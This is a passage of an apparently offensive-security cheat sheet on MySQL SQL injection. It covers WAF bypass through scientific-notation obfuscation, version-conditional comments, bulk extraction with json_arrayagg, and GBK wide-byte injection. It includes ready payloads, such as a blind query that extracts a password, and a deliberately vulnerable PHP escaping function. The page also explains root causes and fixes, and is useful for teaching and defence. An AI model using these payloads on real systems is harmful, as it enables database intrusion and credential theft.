<a id="__codelineno-52-25" name="__codelineno-52-25" href="#__codelineno-52-25"></a><span class="o">+</span><span class="c1">------------------+</span>
<a id="__codelineno-52-26" name="__codelineno-52-26" href="#__codelineno-52-26"></a><span class="o">|</span><span class="w"> </span><span class="mi">8</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">27</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-52-27" name="__codelineno-52-27" href="#__codelineno-52-27"></a><span class="o">+</span><span class="c1">------------------+</span>
</code></pre></div>
<h3 id="alternative-to-group_concat">Alternative to GROUP_CONCAT</h3>
<p>Requirement: <code>MySQL &gt;= 5.7.22</code></p>
<p>Use <code>json_arrayagg()</code> instead of <code>group_concat()</code>: the output of <code>group_concat()</code> is silently truncated at <code>group_concat_max_len</code> (1024 bytes by default), whereas <code>json_arrayagg()</code> is not subject to that limit and can return far more data in one row.</p>
<ul>
<li><code>group_concat()</code> = 1024 symbols</li>
<li><code>json_arrayagg()</code> &gt; 16,000,000 symbols</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-53-1" name="__codelineno-53-1" href="#__codelineno-53-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">json_arrayagg</span><span class="p">(</span><span class="n">concat_ws</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,</span><span class="n">table_schema</span><span class="p">,</span><span class="k">table_name</span><span class="p">))</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">INFORMATION_SCHEMA</span><span class="p">.</span><span class="n">TABLES</span><span class="p">;</span>
</code></pre></div>
<h3 id="scientific-notation">Scientific Notation</h3>
<p>In MySQL, the e notation is used to represent numbers in scientific notation. It's a way to express very large or very small numbers in a concise format. The e notation consists of a number followed by the letter e and an exponent.
The format is: <code>base 'e' exponent</code>.</p>
<p>For example:</p>
<ul>
<li><code>1e3</code> represents <code>1 x 10^3</code> which is <code>1000</code>. </li>
<li><code>1.5e3</code> represents <code>1.5 x 10^3</code> which is <code>1500</code>. </li>
<li><code>2e-3</code> represents <code>2 x 10^-3</code> which is <code>0.002</code>. </li>
</ul>
<p>The following queries are equivalent:</p>
<ul>
<li><code>SELECT table_name FROM information_schema 1.e.tables</code> </li>
<li><code>SELECT table_name FROM information_schema .tables</code> </li>
</ul>
<p>In the same way, the common payload to bypass authentication <code>' or ''='</code> is equivalent to <code>' or 1.e('')='</code> and <code>1' or 1.e(1) or '1'='1</code>.
This technique can be used to obfuscate queries to bypass WAF, for example: <code>1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2</code> </p>
<h3 id="conditional-comments">Conditional Comments</h3>
<p>MySQL conditional comments are enclosed within <code>/*! ... */</code> and can include a version number to specify the minimum version of MySQL that should execute the contained code.
The code inside this comment is executed only if the server version is greater than or equal to the number immediately following the <code>/*!</code>, encoded as <code>MMmmrr</code> (major, minor, release; e.g. <code>50700</code> for 5.7.0). If the server version is lower, the contents are treated as a comment and ignored. Because this syntax is specific to MySQL and MariaDB, most other databases treat the whole construct as a plain comment, which also makes it a useful fingerprint. </p>
<ul>
<li><code>/*!12345UNION*/</code>: the number decodes to version 1.23.45, which every MySQL server exceeds, so <code>UNION</code> is always executed; the low number is chosen precisely so that the comment never disables the keyword.</li>
<li><code>/*!31337SELECT*/</code>: likewise version 3.13.37, so <code>SELECT</code> is always executed.</li>
</ul>
<p><strong>Examples</strong>: <code>/*!12345UNION*/</code>, <code>/*!31337SELECT*/</code></p>
<h3 id="wide-byte-injection-gbk">Wide Byte Injection (GBK)</h3>
<p>Wide byte injection is a specific type of SQL injection attack that targets applications using multi-byte character sets, like GBK or SJIS. The term "wide byte" refers to character encodings where one character can be represented by more than one byte. This type of injection is particularly relevant when the application and the database interpret multi-byte sequences differently.</p>
<p>The <code>SET NAMES gbk</code> query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code.</p>
<p>Several byte sequences can be used to trigger the injection. The common idea is that a GBK lead byte (<code>0x81</code>–<code>0xFE</code>) swallows the backslash (<code>0x5c</code>) that the escaping routine inserts in front of a quote, so the quote that follows is no longer escaped.</p>
<ul>
<li><code>%bf%27</code>: URL-encoded bytes <code>0xbf 0x27</code>. After the application escapes the quote this becomes <code>0xbf 0x5c 0x27</code>; under GBK, <code>0xbf5c</code> is a valid two-byte character, so the backslash is consumed as a trail byte and the single quote (<code>'</code>) survives, effectively ending the string.</li>
<li><code>%bf%5c</code>: Represents the byte sequence <code>0xbf5c</code>. In GBK, this decodes to a valid multi-byte character followed by a backslash (<code>\</code>). This can be used to escape the next character in the sequence.</li>
<li><code>%a1%27</code>: Represents the byte sequence <code>0xa127</code>. Same mechanism with lead byte <code>0xa1</code>: once the quote is escaped, <code>0xa15c</code> forms a valid GBK character and the single quote (<code>'</code>) is left unescaped.</li>
</ul>
<p>A lot of payloads can be created such as:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-54-1" name="__codelineno-54-1" href="#__codelineno-54-1"></a><span class="o">%</span><span class="n">A8</span><span class="o">%</span><span class="mi">27</span><span class="w"> </span><span class="k">OR</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="p">;</span><span class="c1">--</span>
<a id="__codelineno-54-2" name="__codelineno-54-2" href="#__codelineno-54-2"></a><span class="o">%</span><span class="mi">8</span><span class="k">C</span><span class="o">%</span><span class="n">A8</span><span class="o">%</span><span class="mi">27</span><span class="w"> </span><span class="k">OR</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="c1">--</span>
<a id="__codelineno-54-3" name="__codelineno-54-3" href="#__codelineno-54-3"></a><span class="o">%</span><span class="n">bf</span><span class="err">&#39;</span><span class="w"> </span><span class="k">OR</span><span class="w"> </span><span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="w"> </span><span class="c1">-- --</span>
</code></pre></div>
<p>Here is a PHP example using GBK encoding and filtering the user input to escape backslash, single and double quote. Two root causes are visible: the escaping is done byte-wise by regex with no knowledge of the connection charset, and the charset is switched with <code>SET NAMES</code>, which the client library does not see (even <code>mysql_real_escape_string()</code> would escape against the wrong charset in that case). Set the charset through the client API (<code>mysqli_set_charset()</code>) and use prepared statements instead.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-55-1" name="__codelineno-55-1" href="#__codelineno-55-1"></a><span class="x">function check_addslashes($string)</span>
<a id="__codelineno-55-2" name="__codelineno-55-2" href="#__codelineno-55-2"></a><span class="x">{</span>
<a id="__codelineno-55-3" name="__codelineno-55-3" href="#__codelineno-55-3"></a><span class="x"> $string = preg_replace(&#39;/&#39;. preg_quote(&#39;\\&#39;) .&#39;/&#39;, &quot;\\\\\\&quot;, $string); //escape any backslash</span>
<a id="__codelineno-55-4" name="__codelineno-55-4" href="#__codelineno-55-4"></a><span class="x"> $string = preg_replace(&#39;/\&#39;/i&#39;, &#39;\\\&#39;&#39;, $string); //escape single quote with a backslash</span>
<a id="__codelineno-55-5" name="__codelineno-55-5" href="#__codelineno-55-5"></a><span class="x"> $string = preg_replace(&#39;/\&quot;/&#39;, &quot;\\\&quot;&quot;, $string); //escape double quote with a backslash</span>
<a id="__codelineno-55-6" name="__codelineno-55-6" href="#__codelineno-55-6"></a>
<a id="__codelineno-55-7" name="__codelineno-55-7" href="#__codelineno-55-7"></a><span class="x"> return $string;</span>
<a id="__codelineno-55-8" name="__codelineno-55-8" href="#__codelineno-55-8"></a><span class="x">}</span>
<a id="__codelineno-55-9" name="__codelineno-55-9" href="#__codelineno-55-9"></a>
<a id="__codelineno-55-10" name="__codelineno-55-10" href="#__codelineno-55-10"></a><span class="x">$id=check_addslashes($_GET[&#39;id&#39;]);</span>
<a id="__codelineno-55-11" name="__codelineno-55-11" href="#__codelineno-55-11"></a><span class="x">mysql_query(&quot;SET NAMES gbk&quot;);</span>
<a id="__codelineno-55-12" name="__codelineno-55-12" href="#__codelineno-55-12"></a><span class="x">$sql=&quot;SELECT * FROM users WHERE id=&#39;$id&#39; LIMIT 0,1&quot;;</span>
<a id="__codelineno-55-13" name="__codelineno-55-13" href="#__codelineno-55-13"></a><span class="x">print_r(mysql_error());</span>
</code></pre></div>
<p>Here's a breakdown of how the wide byte injection works:</p>
<p>For instance, if the input is <code>?id=1'</code>, PHP will add a backslash, resulting in the SQL query: <code>SELECT * FROM users WHERE id='1\'' LIMIT 0,1</code>.</p>
<p>However, when the sequence <code>%df</code> is introduced before the single quote, as in <code>?id=1%df'</code>, PHP still adds the backslash. This results in the SQL query: <code>SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1</code>. </p>
<p>In the GBK character set, the sequence <code>%df%5c</code> forms a single valid two-byte character (shown here as <code>連</code>; the exact glyph does not matter, only that the byte pair is a valid GBK character). So, the SQL query becomes: <code>SELECT * FROM users WHERE id='1連'' LIMIT 0,1</code>. Here, the wide-byte character effectively "eats" the added escape character, leaving the single quote unescaped and allowing SQL injection.</p>
<p>Therefore, by using the payload <code>?id=1%df' and 1=1 --+</code>, after PHP adds the backslash, the SQL query transforms into: <code>SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1</code>. This altered query can be successfully injected, bypassing the intended SQL logic.</p>
<h2 id="references">References</h2>
<ul>
<li><a href="https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/">[SQLi] Extracting data without knowing columns names - Ahmed Sultan - February 9, 2019</a></li>
<li><a href="https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/">A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021</a></li>
<li><a href="https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/">Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017</a></li>
<li><a href="https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100">Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016</a></li>
<li><a href="https://sqlwiki.netspi.com/injectionTypes/errorBased">Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021</a></li>
<li><a href="https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf">How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010</a></li>
<li><a href="https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf">MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018</a></li>
<li><a href="https://resources.infosecinstitute.com/sql-truncation-attack/">SQL Truncation Attack - Rohit Shaw - June 29, 2014</a></li>
<li><a href="https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/">SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010</a></li>
<li><a href="https://websec.ca/kb/sql_injection#MySQL_Default_Databases">The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">January 14, 2025</span>
</span>
</aside>
</article>
</div>
</body>
</html>